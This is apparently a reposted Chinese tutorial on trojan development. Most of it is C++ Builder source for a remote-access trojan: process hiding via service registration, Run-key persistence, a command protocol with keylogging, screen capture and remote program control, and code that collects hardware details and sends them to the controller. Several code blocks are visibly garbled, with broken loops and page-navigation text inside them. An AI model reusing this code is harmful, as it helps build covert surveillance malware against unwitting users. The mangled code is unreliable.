木马程序开发技术:病毒源代码详解

2023-12-16 21:58
文章标签 详解 源代码 病毒 开发技术 木马程序

本文主要是介绍木马程序开发技术:病毒源代码详解,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

  1. 近年来,黑客技术不断成熟起来,对网络安全造成了极大的威胁,黑客的主要攻击手段之一,就是使用木马技术,渗透到对方的主机系统里,从而实现对远程操作目标主机。 其破坏力之大,是绝不容忽视的,黑客到底是如何制造了这种种具有破坏力的木马程序呢,下面我对木马进行源代码级的详细的分析,让我们对木马的开发技术做一次彻底的透视,从了解木马技术开始,更加安全的管理好自己的计算机。

  2.   1、木马程序的分类
  3.   木马程序技术发展至今,已经经历了4代,第一代,即是简单的密码窃取,发送等,没有什么特别之处。第二代木马,在技术上有了很大的进步,冰河可以说为是国内木马的典型代表之一。第三代木马在数据传递技术上,又做了不小的改进,出现了ICMP等类型的木马,利用畸形报文传递数据,增加了查杀的难度。第四代木马在进程隐藏方面,做了大的改动,采用了内核插入式的嵌入方式,利用远程插入线程技术,嵌入DLL线程。或者挂接PSAPI,实现木马程序的隐藏,甚至在Windows NT/2000下,都达到了良好的隐藏效果。相信,第五代木马很快也会被编制出来。关于更详细的说明,可以参考ShotGun的文章《揭开木马的神秘面纱》。
  4.   2.木马程序的隐藏技术
  5.   木马程序的服务器端,为了避免被发现,多数都要进行隐藏处理,下面让我们来看看木马是如何实现隐藏的。
  6.   说到隐藏,首先得先了解三个相关的概念:进程,线程和服务。我简单的解释一下。
  7.   进程:一个正常的Windows应用程序,在运行之后,都会在系统之中产生一个进程,同时,每个进程,分别对应了一个不同的PID(Progress ID, 进程标识符)这个进程会被系统分配一个虚拟的内存空间地址段,一切相关的程序操作,都会在这个虚拟的空间中进行。
  8.   线程:一个进程,可以存在一个或多个线程,线程之间同步执行多种操作,一般地,线程之间是相互独立的,当一个线程发生错误的时候,并不一定会导致整个进程的崩溃。
  9.   服务:一个进程当以服务的方式工作的时候,它将会在后台工作,不会出现在任务列表中,但是,在Windows NT/2000下,你仍然可以通过服务管理器检查任何的服务程序是否被启动运行。
  10.   想要隐藏木马的服务器端,可以伪隐藏,也可以是真隐藏。伪隐藏,就是指程序的进程仍然存在,只不过是让他消失在进程列表里。真隐藏则是让程序彻底的消失,不以一个进程或者服务的方式工作。
  11.   伪隐藏的方法,是比较容易实现的,只要把木马服务器端的程序注册为一个服务就可以了,这样,程序就会从任务列表中消失了,因为系统不认为他是一个进程,当按下Ctrl+Alt+Delete的时候,也就看不到这个程序。但是,这种方法只适用于Windows9x的系统,对于Windows NT,Windows 2000等,通过服务管理器,一样会发现你在系统中注册过的服务。难道伪隐藏的方法就真的不能用在Windows NT/2000下了吗?当然还有办法,那就是API的拦截技术,通过建立一个后台的系统钩子,拦截PSAPI的EnumProcessModules等相关的函数来实现对进程和服务的遍历调用的控制,当检测到进程ID(PID)为木马程序的服务器端进程的时候直接跳过,这样就实现了进程的隐藏,金山词霸等软件,就是使用了类似的方法,拦截了TextOutA,TextOutW函数,来截获屏幕输出,实现即时翻译的。同样,这种方法也可以用在进程隐藏上。
  12.   当进程为真隐藏的时候,那么这个木马的服务器部分程序运行之后,就不应该具备一般进程,也不应该具备服务的,也就是说,完全的溶进了系统的内核。也许你会觉得奇怪,刚刚不是说一个应用程序运行之后,一定会产生一个进程吗?的确,所以我们可以不把他做成一个应用程序,而把他做为一个线程,一个其他应用程序的线程,把自身注入其他应用程序的地址空间。而这个应用程序对于系统来说,是一个绝对安全的程序,这样,就达到了彻底隐藏的效果,这样的结果,导致了查杀黑客程序难度的增加。
  13.   出于安全考虑,我只给出一种通过注册服务程序,实现进程伪隐藏的方法,对于更复杂,高级的隐藏方法,比如远程线程插入其他进程的方法,请参阅ShotGun的文章《NT系统下木马进程的隐藏与检测》。
  14.   WINAPI WinMain(HINSTANCE, HINSTANCE, LPSTR, int)
  15.   {
  16.   try
  17.   {
  18.   DWORD dwVersion = GetVersion();//取得Windows的版本号
  19.   if (dwVersion >= 0x80000000) // Windows 9x隐藏任务列表
  20.   {
  21.    int (CALLBACK *rsp)(DWORD,DWORD);
  22.    HINSTANCE dll=LoadLibrary("KERNEL32.DLL");//装入KERNEL32.DLL
  23.   rsp=(int(CALLBACK *)(DWORD,DWORD))GetProcAddress(dll,"RegisterServiceProcess");//找到RegisterServiceProcess的入口
  24.   rsp(NULL,1);//注册服务
  25.   FreeLibrary(dll);//释放DLL模块
  26.   }
  27.   }
  28.   catch (Exception &exception)//处理异常事件
  29.   {
  30.   //处理异常事件
  31.   }
  32.   return 0;
  33.   } 
  34.   3、程序的自加载运行技术
  35.   让程序自运行的方法比较多,除了最常见的方法:加载程序到启动组,写程序启动路径到注册表的HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersions/Run的方法外,还有很多其他的办法,据yagami讲,还有几十种方法之多,比如可以修改Boot.ini,或者通过注册表里的输入法键值直接挂接启动,通过修改Explorer.exe启动参数等等的方法,真的可以说是防不胜防,下面展示一段通过修改HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersions/Run键值来实现自启动的程序:
  36.   自装载部分:
  37.   HKEY hkey;
  38.   AnsiString NewProgramName=AnsiString(sys)+AnsiString("+PName/">//")+PName
  39.   unsigned long k;
  40.   k=REG_OPENED_EXISTING_KEY;
  41.   RegCreateKeyEx(HKEY_LOCAL_MACHINE,
  42.   "SOFTWARE//MICROSOFT//WINDOWS//CURRENTVERSION//RUN//",
  43.   0L,
  44.   NULL,
  45.   REG_OPTION_NON_VOLATILE,KEY_ALL_ACCESS|KEY_SET_VALUE,
  46.   NULL,
  47.   &hkey,&k);
  48.   RegSetValueEx(hkey,
  49.   "BackGroup",
  50.   0,
  51.   REG_SZ,
  52.   NewProgramName.c_str(),
  53.   NewProgramName.Length());
  54.   RegCloseKey(hkey);
  55.   if (int(ShellExecute(Handle,
  56.   "open",
  57.   NewProgramName.c_str(),
  58.   NULL,
  59.   NULL,
  60.   SW_HIDE))>32)
  61.   {
  62.   WantClose=true;
  63.   Close();
  64.   }
  65.   else
  66.   {
  67.   HKEY hkey;
  68.   unsigned long k;
  69.   k=REG_OPENED_EXISTING_KEY;
  70.   long a=RegCreateKeyEx(HKEY_LOCAL_MACHINE,
  71.   "SOFTWARE//MICROSOFT//WINDOWS//CURRENTVERSION//RUN",
  72.   0,
  73.   NULL,
  74.   REG_OPTION_NON_VOLATILE,
  75.   KEY_SET_VALUE,NULL,
  76.   &hkey,&k);
  77.   RegSetValueEx(hkey,
  78.   "BackGroup",
  79.   0,
  80.   REG_SZ,
  81.   ProgramName.c_str(),
  82.   ProgramName.Length());
  83.   int num=0;
  84.   char str[20];
  85.   DWORD lth=20;
  86.   DWORD type;
  87.   char strv[255];
  88.   DWORD vl=254;
  89.   DWORD Suc;
  90.   do{
  91.   Suc=RegEnumValue(HKEY_LOCAL_MACHINE,
  92.   (DWORD)num,str,
  93.   NULL,
  94.   &type,
  95.   strv,&vl);
  96.   if (strcmp(str,"BGroup")==0)
  97.   {
  98.    DeleteFile(AnsiString(strv));
  99.    RegDeleteValue(HKEY_LOCAL_MACHINE,"BGroup");
  100.    break;
  101.   }
  102.   }while(Suc== ERROR_SUCCESS);
  103.   RegCloseKey(hkey);
  104.   }
  105.   自装载程序的卸载代码:
  106.   int num;
  107.   char str2[20];
  108.   DWORD lth=20;
  109.   DWORD type;
  110.   char strv[255];
  111.   DWORD vl=254;
  112.   DWORD Suc;
  113.   do{
  114.   Suc=RegEnumValue(HKEY_LOCAL_MACHINE,
  115.   (DWORD)num,
  116.   str,
  117.   NULL,
  118.   &type,
  119.   strv,
  120.   &vl);
  121.   if (strcmp(str,"BGroup")==0)
  122.   {
  123.   DeleteFile(AnsiString(strv));
  124.   RegDeleteValue(HKEY_LOCAL_MACHINE,"BGroup");
  125.   break;
  126.   }
  127.   }while(Suc== ERROR_SUCCESS)
  128.   HKEY hkey;
  129.   unsigned long k;
  130.   k=REG_OPENED_EXISTING_KEY;
  131.   RegCreateKeyEx(HKEY_LOCAL_MACHINE,
  132.   "SOFTWARE//MICROSOFT//WINDOWS//CURRENTVERSION//RUN",
  133.   0,
  134.   NULL,
  135.   REG_OPTION_NON_VOLATILE,
  136.   KEY_SET_VALUE,NULL,
  137.   &hkey,
  138.   &k);
  139.   do{
  140.   Suc=RegEnumValue(hkey,(DWORD)num,str,if (strcmp(str,"BackGroup")==0)
  141.   {
  142.   DeleteFile(AnsiString(strv));
  143.   RegDeleteValue(HKEY_LOCAL_MACHINE,"BackGroup");
  144.   break;
  145.   }
  146.   }while(Suc== ERROR_SUCCESS)
  147.   RegCloseKey(hkey);
  148.   其中自装载部分使用C++ Builder可以这样写,会比较简化:
  149.   TRegistry & regKey = *new TRegistry();
  150.   regKey.RootKey=HKEY_LOCAL_MACHINE;
  151.   regKey.OpenKey("Software//Microsoft//Windows//CurrentVersion//Run",true);
  152.   if(!regKey.ValueExists("Interbase Server"))
  153.   {
  154.   regKey.WriteString("Interbase Server",
  155.   "D://Program Files//Borland//IntrBase//BIN//ibserver.exe");
  156.   }
  157.   regKey.CloseKey();
  158.   delete ®Key;
  159.  4、木马程序的建立连接的隐藏
  160.  
  161.   木马程序的数据传递方法有很多种,其中最常见的要属TCP,UDP传输数据的方法了,通常是利用Winsock与目标机的指定端口建立起连接,使用send和recv等API进行数据的传递,但是由于这种方法的隐蔽性比较差,往往容易被一些工具软件查看到,最简单的,比如在命令行状态下使用netstat命令,就可以查看到当前的活动TCP,UDP连接。
  162.   C:/Documents and Settings/bigball>netstat -n
  163.   Active Connections
  164.   Proto Local Address Foreign Address State
  165.   TCP 192.0.0.9:1032 64.4.13.48:1863 ESTABLISHED
  166.   TCP 192.0.0.9:1112 61.141.212.95:80 ESTABLISHED
  167.   TCP 192.0.0.9:1135 202.130.239.223:80 ESTABLISHED
  168.   TCP 192.0.0.9:1142 202.130.239.223:80 ESTABLISHED
  169.   TCP 192.0.0.9:1162 192.0.0.8:139 TIME_WAIT
  170.   TCP 192.0.0.9:1169 202.130.239.159:80 ESTABLISHED
  171.   TCP 192.0.0.9:1170 202.130.239.133:80 TIME_WAIT
  172.   C:/Documents and Settings/bigball>netstat -a
  173.   Active Connections
  174.   Proto Local Address Foreign Address State
  175.   TCP Liumy:echo Liumy:0 LISTENING
  176.   TCP Liumy:discard Liumy:0 LISTENING
  177.   TCP Liumy:daytime Liumy:0 LISTENING
  178.   TCP Liumy:qotd Liumy:0 LISTENING
  179.   TCP Liumy:chargen Liumy:0 LISTENING
  180.   TCP Liumy:epmap Liumy:0 LISTENING
  181.   TCP Liumy:microsoft-ds Liumy:0 LISTENING
  182.   TCP Liumy:1025 Liumy:0 LISTENING
  183.   TCP Liumy:1026 Liumy:0 LISTENING
  184.   TCP Liumy:1031 Liumy:0 LISTENING
  185.   TCP Liumy:1032 Liumy:0 LISTENING
  186.   TCP Liumy:1112 Liumy:0 LISTENING
  187.   TCP Liumy:1135 Liumy:0 LISTENING
  188.   TCP Liumy:1142 Liumy:0 LISTENING
  189.   TCP Liumy:1801 Liumy:0 LISTENING
  190.   TCP Liumy:3372 Liumy:0 LISTENING
  191.   TCP Liumy:3389 Liumy:0 LISTENING
  192.   TCP Liumy:netbios-ssn Liumy:0 LISTENING
  193.   TCP Liumy:1028 Liumy:0 LISTENING
  194.   TCP Liumy:1032 msgr-ns19.msgr.hotmail.com:1863 ESTAB
  195.   TCP Liumy:1112 szptt61.141.szptt.net.cn:http ESTABLI
  196.   TCP Liumy:1135 202.130.239.223:http ESTABLISHED
  197.   TCP Liumy:1142 202.130.239.223:http ESTABLISHED
  198.   TCP Liumy:1162 W3I:netbios-ssn TIME_WAIT
  199.   TCP Liumy:1170 202.130.239.133:http TIME_WAIT
  200.   TCP Liumy:2103 Liumy:0 LISTENING
  201.   TCP Liumy:2105 Liumy:0 LISTENING
  202.   TCP Liumy:2107 Liumy:0 LISTENING
  203.   UDP Liumy:echo *:*
  204.   UDP Liumy:discard *:*
  205.   UDP Liumy:daytime *:*
  206.   UDP Liumy:qotd *:*
  207.   UDP Liumy:chargen *:*
  208.   UDP Liumy:epmap *:*
  209.   UDP Liumy:snmp *:*
  210.   UDP Liumy:microsoft-ds *:*
  211.   UDP Liumy:1027 *:*
  212.   UDP Liumy:1029 *:*
  213.   UDP Liumy:3527 *:*
  214.   UDP Liumy:4000 *:*
  215.   UDP Liumy:4001 *:*
  216.   UDP Liumy:1033 *:*
  217.   UDP Liumy:1148 *:*
  218.   UDP Liumy:netbios-ns *:*
  219.   UDP Liumy:netbios-dgm *:*
  220.   UDP Liumy:isakmp *:*
  221.   但是,黑客还是用种种手段躲避了这种侦察,就我所知的方法大概有两种,一种是合并端口法,也就是说,使用特殊的手段,在一个端口上同时绑定两个TCP或者UDP连接,这听起来不可思议,但事实上确实如此,而且已经出现了使用类似方法的程序,通过把自己的木马端口绑定于特定的服务端口之上,(比如80端口的HTTP,谁怀疑他会是木马程序呢?)从而达到隐藏端口的目地。另外一种办法,是使用ICMP(Internet Control Message Protocol)协议进行数据的发送,原理是修改ICMP头的构造,加入木马的控制字段,这样的木马,具备很多新的特点,不占用端口的特点,使用户难以发觉,同时,使用ICMP可以穿透一些防火墙,从而增加了防范的难度。之所以具有这种特点,是因为ICMP不同于TCP,UDP,ICMP工作于网络的应用层不使用TCP协议。关于网络层次的结构,下面给出图示:

  222. 按此在新窗口浏览图片
  223.    网络层次结构图
  224.   5、发送数据的组织方法
  225.   关于数据的组织方法,可以说是数学上的问题。关键在于传递数据的可靠性,压缩性,以及高效行。木马程序,为了避免被发现,必须很好的控制数据传输量,一个编制较好的木马,往往有自己的一套传输协议,那么程序上,到底是如何组织实现的呢?下面,我举例包装一些协议:
  226.   typedef struct{ //定义消息结构
  227.   //char ip[20];
  228.   char Type; //消息种类
  229.   char Password[20]; //密码
  230.   int CNum; //消息操作号
  231.   //int Length; //消息长度
  232.   }Msg;
  233.   #define MsgLen sizeof(Msg)
  234.   //-------------------------------------------
  235.   //对话框数据包定义:Dlg_Msg_Type.h
  236.   //-------------------------------------------
  237.   //定义如下消息类型:
  238.   #define MsgDlgCommon 4//连接事件
  239.   #define MsgDlgSend 5//发送完成事件
  240.   //消息结构
  241.   typedef struct{
  242.   char Name[20];//对话框标题
  243.   char Msg[256];//对话框消息内容
  244.   }MsgDlgUint;
  245.   #define MsgDlgLen sizeof(MsgDlgUint)//消息单元长度
  246.   //------------------------------------------
  247.   //聊天数据包定义:Chat_Msg_Type.h
  248.   //------------------------------------------
  249.   //定义如下消息类型:
  250.   #define MsgChatCommon 0//连接事件
  251.   #define MsgChatConnect 1//接入事件
  252.   #define MsgChatEscept 2//结束事件
  253.   #define MsgChatReceived 16//确认对话内容收到
  254.   //消息结构
  255.   typedef struct{
  256.   char ClientName[20];//Client自定义的名称
  257.   char Msg[256];//发送的消息
  258.   }MsgChatUint;
  259.   #define MsgChatLen sizeof(MsgChatUint)//消息单元长度
  260.   //------------------------------------------
  261.   //重启数据包定义:Reboot_Msg_Type.h
  262.   //------------------------------------------
  263.   //定义如下消息类型:
  264.   #define MsgReBoot 15//重启事件
  265.   //------------------------------------------
  266.   //目录结构请求数据包定义:Dir_Msg_Type.h
  267.   //------------------------------------------
  268.   //定义如下消息类型:
  269.   #define MsgGetDirInfo 17
  270.   #define MsgReceiveGetDirInfo 18
  271.   typedef struct{
  272.   char Dir[4096];//你要的目录名
  273.   }MsgDirUint;
  274.   #define MsgDirUintLen sizeof(MsgDirUint)
  275.   // TCP的Msg
  276.   typedef struct{ //定义消息结构
  277.   char SType; //消息种类
  278.   char SPassword[20]; //密码
  279.   //int SNum; //消息操作号
  280.   char *AllMsg;
  281.   }SMsg;
  282.   #define SMsgLen sizeof(SMsg)
  283.   #define MSGListProgram 19
  284.   #define MSGFlyMouse 21
  285.   #define MSGGoWithMouse 22
  286.   #define MSGSaveKey 23
  287.   #define MSGTracekey 24
  288.   #define MsgCopyScreen 25//tcp接收消息,udp请求消息
  289.   #define MSGCopyWindow 26
  290.   //-------------------------
  291.   //鼠标指针隐藏和显示控制
  292.   //-------------------------
  293.   #define MsgSetMouseStat 27//设置消息
  294.   #define MsgMouseStat 28//成功消息
  295.   typedef struct{
  296.   bool mouseshow;
  297.   }MsgSetMouseStatUint;
  298.   #define MsgSetMouseStatUintLen sizeof(MsgSetMouseStatUint)
  299.   
  300.   上一页 1 2 3 4 5 6 7 下一页
  301.   //-------------------------
  302.   //任务栏隐藏和显示控制
  303.   //-------------------------
  304.   #define MsgSetTaskBarStat 29//设置消息
  305.   #define MsgTaskBarStat 30//成功消息
  306.   typedef struct{
  307.   bool taskshow;
  308.   }MsgSetTaskBarStatUint;
  309.   #define MsgSetTaskBarStatUintLen sizeof(MsgSetTaskBarStatUint)
  310.   //-------------------------
  311.   //得到机器名
  312.   //-------------------------
  313.   #define MsgGetNetBiosName 31//取请求
  314.   #define MsgNetBiosName 32//回送机器名
  315.   typedef struct{
  316.   char NetBiosName[128];
  317.   }MsgNetBiosNameUint;
  318.   #define MsgNetBiosNameUintLen sizeof(MsgNetBiosNameUint)
  319.   //-------------------------
  320.   //关闭进程变更!
  321.   //-------------------------
  322.   #define MsgSetProgramClose 33//关闭请求
  323.   #define MsgProgramClosed 34//成功消息-----
  324.   typedef struct{
  325.   char ProgramName[4096];//old struct : char ProgramName[128];//要关闭的窗口的名字
  326.   }MsgSetProgramCloseUint;
  327.   #define MsgSetProgramCloseUintLen sizeof(MsgSetProgramCloseUint)
  328.   //-------------------------
  329.   //打开进程变更!
  330.   //-------------------------
  331.   #define MsgSetProgramOpen 20//打开请求
  332.   #define MsgProgramOpened 36//成功消息
  333.   typedef struct{
  334.   char ProgramName[4096]; //old struct : char ProgramName[128];//要打开的程序的名字
  335.   bool ProgramShow;//前台运行或后台运行程序(隐藏运行)
  336.   }MsgSetProgramOpenUint;
  337.   #define MsgSetProgramOpenUintLen sizeof(MsgSetProgramOpenUint)
  338.   #define MsgGetHardWare 35//请求硬件信息(UDP消息)和回传硬件信息(TCP消息)
  339.   上面一段定义,使用了TCP和UDP两种协议目的就是为了减少TCP连接的几率,这样所消耗的系统资源就会比较少,不容易让目标机察觉。很多木马程序中,都有像上面定义中类似的密码定义,目地是为了防止非真实客户机的连接请求。SNum 为消息操作号,它的作用是为了效验数据是否是发送过的,经过分析而知,我们熟悉的OICQ也正是使用了这一办法来校验消息的。
  340.    数据协议组织好,还有一步工作,就是数据的打包发送,一般的方法是把全部数据压为一个VOID类型的数据流,然后发送:
  341.   Msg *msg=new Msg;
  342.   TMemoryStream *RData=new TMemoryStream;
  343.   NMUDP1->ReadStream(RData);
  344.   RData->Read(msg,sizeof(Msg));
  345.   UdpConnect *udpcon_nect=new UdpConnect;
  346.   NetBiosName *netbiosname=new NetBiosName;
  347.   if(msg->CNum==CNumBak)
  348.   return;
  349.   else{
  350.   CNumBak=msg->CNum;
  351.   switch(msg->Type)
  352.   {
  353.   case 0://MsgUdpConnect
  354.   RData->Read(udpconnect,sizeof(UdpConnect));
  355.   checkuser(udpconnect->IsRight);
  356.   break;
  357.   case 1:
  358.   RData->Read(netbiosname,sizeof(NetBiosName));
  359.   AnsiString jqm="机器名 ";
  360.   jqm+=(AnsiString)netbiosname->NetBiosName;
  361.   Memo2->Lines->Add(jqm);
  362.   break;
  363.   }
  364.   }
  365.   当服务器端收到数据后,首先要做的工作是解包还原VOID流为结构化的协议,这里同样给出事例代码:
  366.   NMUDP1->RemoteHost=FromIP;
  367.   NMUDP1->RemotePort=Port;
  368.   TMemoryStream *RData=new TMemoryStream;
  369.   NMUDP1->ReadStream(RData);
  370.   Msg *msg=new Msg;
  371.   RData->Read(msg,sizeof(Msg));
  372.   if(msg->CNum==CNumBak)
  373.   return;
  374.   else
  375.   {
  376.   CNumBak=msg->CNum;
  377.   switch(msg->Type)
  378.   {
  379.   case 0:
  380.   checkuser(msg->Password);
  381.   break;
  382.   case 1:
  383.   GetNetBiosName();
  384.   break;
  385.   case 2:
  386.   CheckHard();
  387.   break;
  388.   }
  389.   }
  390.   此外,很多木马程序支持了屏幕回传的功能,其根本的原理是先捕获屏幕画面,然后回传给客户机,由于画面的数据量很大所以,很多木马程序都是在画面改变的时候才回传改变部分的画面,常用的手段是最小矩形法,下面以好友“古老传说”的一段算法举例:
  391.   #define MAXXCount 10 //屏幕X方向最多分割块数
  392.   #define MAXYCount 5 //... Y................
  393.   #define DestNum 1000 //每块的偏移检测点最大个数
  394.   COLORREF Colors[MAXXCount][MAXYCount][DestNum];
  395.   COLORREF BakColors[MAXXCount]{MAXYCount][DestNum];
  396.   TPoint Dests[DestNum];
  397.   int Sw;
  398.   int Sh;
  399.   int xCount;
  400.   int yCount;
  401.   int ItemWidth;
  402.   int ItemHeight;
  403.   int Dnum;
  404.   int Qlity;
  405.   //得到消息后执行:
  406.   //另外:接收到的数据包中分析出 Dnum ,Qlity
  407.   //Dnum:偏移观测点数量
  408.   //Qlity:图象要求质量
  409.   __fastcall TForm1::CopyScreen(int DNum,int Qlity){
  410.   ItemWidth=Sw/xCount;
  411.   ItemHeight=Sh/yCount;
  412.   Sw=Screen->Width;
  413.   Sh=Screen->Height;
  414.   xCount=(Sw>1000)?8:6;
  415.   yCount=(Sh>1000)?3:2;
  416.   for (int num1=0;num1 Dests[num1].x=random(ItemWidth);
  417.   Dests[num1].y=random(ItemHeight);
  418.   }
  419.   CatchScreen(DNum,Qlity);
  420.   }
  421.   //收到刷屏消息后只执行:
  422.   CatchScreen(DNum,Qlity);
  423.   __fastcall TForm1::CatchScreen(int DNum,int Qlity){
  424.   //函数功能:扫描改变的屏幕区域,并切经过优化处理,最后发送这些区域数据
  425.   //DNum: 偏移量 Qlity:图象质量
  426.   HDC dc=GetDC(GetDesktopWindow());
  427.   Graphics::TBitmap *bm=new Graphics::TBitmap;
  428.   bm->Width=Sw;
  429.   bm->Height=Sh;
  430.   BitBlt(bm->Canvas->Handle,0,0,Sw-1,Sh-1,dc,0,0);
  431.   int num1,num2,num3;
  432.   int nowx,nowy;
  433.   bool Change;
  434.   bool ItemChange[MAXXCount][MAXYCount];
  435.   for (num1=0;num1 nowx=ItemWidth*num1;
  436.   for (num2=0;num2 nowy=ItemHeight*num2;
  437.   Change=false;
  438.   for (num3=0;num3 Colors[num1][num2][num3]=bm->Canvas->Pixels[nowx+Dests[num3].x][nowy+Dests[num3].y];
  439.   if (Colors[num1][num2][num3]!=BakColors[num1][num2][num3]){
  440.   BakColors[num1][num2][num3]=Colors[num1][num2][num3];
  441.   ItemChange[num1][num2]=true;
  442.   }
  443.   }
  444.   }
  445.   }
  446.   int CNum,MaxCNum;
  447.   int ChangedNum=0;
  448.   TRect *Rect;
  449.   int num4;
  450.   int MinSize=10000;
  451.   int m;
  452.   TRect MinRect;
  453.   Graphics::TBitmap *bt2=new Graphics::TBitmap;
  454.   TJPEGImage *j=new TJPEGImage;
  455.   //************************
  456.   j->Quality=Qlity;
  457.   //************************
  458.   CopyScreenUint CopyScreen;
  459.   CopyScreenItemUint CopyScreenItem;
  460.   TMemoryStream *ms=new TMemoryStream;
  461.   ms->Write(&TcpMsg,sizeof(TcpMsgUint));
  462.   ms->Write(&CopyScreen,sizeof(CopyScreenUint));
  463.   do{
  464.   for (num1=0;num1 for (num2=0;num2 for (num3=num1+1;num3<=xCount;num3++){
  465.   MaxCNum=0;
  466.   for (num4=num2+1;num4<=yCount;num4++){ //遍历所有矩形
  467.   CNum=GetChangedNum(TRect(num1,num2,num3,num4));
  468.   if (CNum>MaxCNum) MaxCNum=CNum;
  469.   m=(num3-num1)*(num4-num2);
  470.   if (2*m-CNum MinSize=2*m-CNum;
  471.   MinRect=TRect(num1,num2,num3,num4);
  472.   }
  473.   }
  474.   }
  475.   TMemoryStream *ms;
  476.   BitBlt(bt2->Canvas->Handle,0,0,ItemWidth-1,ItemHeight-1,bt->Canvas->Handle,0,0);
  477.   j->Assign(bt2);
  478.   j->SaveToStream(ms2);
  479.   CopyScreenItem.Rect=TRect(num1,num2,num3,num4);
  480.   CopyScreenItem.FileType=JPEGFILE; //JPEGFILE 定义为:#define JPEGFILE 1
  481.   ms2->Position=0;
  482.   CopyScreenItem.Length=ms2->Size;
  483.   ms->Write(&CopyScreenItem,sizeof(ScreenItemUint));
  484.   ms->CopyFrom(ms2,ms2->Size);
  485.   ChangedNum++;
  486.   }while(MaxCNum>0);
  487.   TcpMsg.Type=MsgCopyScreen;
  488.   ms->Position=0;
  489.   TcpMsg.Length=ms->Size-sizeof(TcpMsgUint);
  490.   CopyScreen.Count=ChangedNum;
  491.   ms->Write(&TcpMsg,sizeof(TcpMsgUint));
  492.   ms->Write(&CopyScreen,sizeof(CopyScreenUInt));
  493.   ms->Position=0;
  494.   sock->SendStream(ms);
  495.   }
  496. 6、目标机器情况的获取

     

      相对于以上几部分来说,这里实现的方法简单多了,这一段内容会比较轻松,一般获取机器情况的方法是调用相关的API,这一点上是和应用程序很相像的。

      AnsiString cs;

      FILE *fp;

      fp=fopen("temp.had","w+");

      //TODO: Add your source code here

      //获得CPU型号

      SYSTEM_INFO systeminfo;

      GetSystemInfo (&systeminfo);

      cs="CPU类型是:"+String(systeminfo.dwProcessorType)+"/n";

      fwrite(cs.c_str(),cs.Length(),1,fp);

      MEMORYSTATUS memory;

      memory.dwLength =sizeof(memory); //初始化

      GlobalMemoryStatus(&memory);

      cs="物理内存是(Mb):"+String(int(memory.dwTotalPhys /1024/1024))+"/n";

      fwrite(cs.c_str(),cs.Length(),1,fp);

      cs="可用内存是(Kb):"+String(int( memory.dwAvailPhys/1024))+"/n";

      fwrite(cs.c_str(),cs.Length(),1,fp);

      DWORD sector,byte,cluster,free;

      long int freespace,totalspace;

      UINT type;

      char name;

      //0—未知盘、1—不存在、2—可移动磁盘、3—固定磁盘、4—网络磁盘、

      //5—CD-ROM、6—内存虚拟盘

      char volname[255],filename[100];//buffer[512];

      DWORD sno,maxl,fileflag ;

      for (name=‘A‘;name<=‘Z‘;name++) {//循环检测A~Z

      type = GetDriveType(AnsiString(AnsiString(name)+‘:‘).c_str()); //获得磁盘类型

      if(type==0){

      cs="未知类型磁盘:"+String(name)+"/n";

      fwrite(cs.c_str(),cs.Length(),1,fp);

      }

      else if(type==2){

      cs="可移动类型磁盘:"+String(name)+"/n";

      fwrite(cs.c_str(),cs.Length(),1,fp);

      }

      else if(type==3){

      cs="固定磁盘:"+String(name)+"/n";

      fwrite(cs.c_str(),cs.Length(),1,fp);

      }

      else if(type==4) {

      cs="网络映射磁盘:"+String(name)+"/n";

      fwrite(cs.c_str(),cs.Length(),1,fp);

      }

      else if (type==5){

      cs="光驱:"+String(name)+"/n";

      fwrite(cs.c_str(),cs.Length(),1,fp);

      }

      else if (type==6){

      cs="内存虚拟磁盘:"+String(name)+"/n";

      fwrite(cs.c_str(),cs.Length(),1,fp);

      }

       if(GetVolumeInformation((String(name)+String(‘:‘)).c_str(), volname,255,&sno,&maxl,&fileflag,filename,100)){

      cs=String(name)+"盘卷标为:"+String(volname)+"/n";

      fwrite(cs.c_str(),cs.Length(),1,fp);

      cs=String(name)+"盘序号为:"+String(sno)+"/n";

      fwrite(cs.c_str(),cs.Length(),1,fp);

      GetDiskFreeSpace((String(name)+String(‘:‘)).c_str(),§or,&byte,&free,&cluster); //获得返回参数

      totalspace=int(cluster)*byte*sector/1024/1024; //计算总容量

      freespace=int(free)*byte*sector/1024/1024; //计算可用空间

      cs=String(name)+String(‘:‘)+"盘总空间(Mb):"+AnsiString(totalspace)+"/n";

      fwrite(cs.c_str(),cs.Length(),1,fp);

      cs=String(name)+String(‘:‘)+"盘可用空间(Mb):"+AnsiString(freespace)+"/n";

      fwrite(cs.c_str(),cs.Length(),1,fp);

      }

      }

      int wavedevice,mididevice;

      WAVEOUTCAPS wavecap;

      MIDIOUTCAPS midicap;

      wavedevice=(int)waveOutGetNumDevs(); //波形设备信息

      mididevice=(int)midiOutGetNumDevs(); // MIDI设备信息

      if (wavedevice!=0){

      waveOutGetDevCaps(0,&wavecap,sizeof(WAVEOUTCAPS));

      cs="当前波形设备:"+String(wavecap.szPname)+"/n";

      fwrite(cs.c_str(),cs.Length(),1,fp);

      }

      if (mididevice!=0){

      midiOutGetDevCaps(0,&midicap,sizeof(MIDIOUTCAPS));

      cs="当前MIDI设备:"+String(midicap.szPname)+"/n";

      fwrite(cs.c_str(),cs.Length(),1,fp);

      }

      long double tcs;

      long double tc;

      long int bpp,cp;

      cs="当前分辨率为:"+String(Screen->Width)+AnsiString("*")+ String(Screen->Height)+"/n";

      fwrite(cs.c_str(),cs.Length(),1,fp);

      bpp=GetDeviceCaps(Canvas->Handle ,BITSPIXEL);

      tcs=pow(2,bpp); //计算色彩的梯度数

      cp= GetDeviceCaps(Form1->Canvas->Handle,PLANES);

      tc= pow(double(tcs),double(cp)); //计算色深

      AnsiString sss;

      sss=bpp;

      cs="当前色深为:"+sss+"/n";

      fwrite(cs.c_str(),cs.Length(),1,fp);

      fclose(fp);

      AnsiString FileName="temp.had";

      char *buf;

      TcpMsgUint Msg2;

      strcpy(Msg2.TPassword,Password);

      TMemoryStream *ms=new TMemoryStream;

      ms->Clear();

      if (!FileExists(FileName)) CheckHard();

      TFileStream *fs=new TFileStream(FileName,fmOpenRead);

      上一页 1 2 3

      buf=new char[fs->Size+sizeof(TcpMsgUint)+1];

      fs->Read(buf,fs->Size);

      Msg2.Type=MsgGetHardWare;

      Msg2.Length=fs->Size;

      FileClose(fs->Handle);

      ms->Write(&Msg2,sizeof(TcpMsgUint));

      ms->Write(buf,Msg2.Length);

      ms->Position=0;

      delete []buf;

      try{

      sock->SendStream(ms);

      }

      catch(Exception&e) {

      }

      }

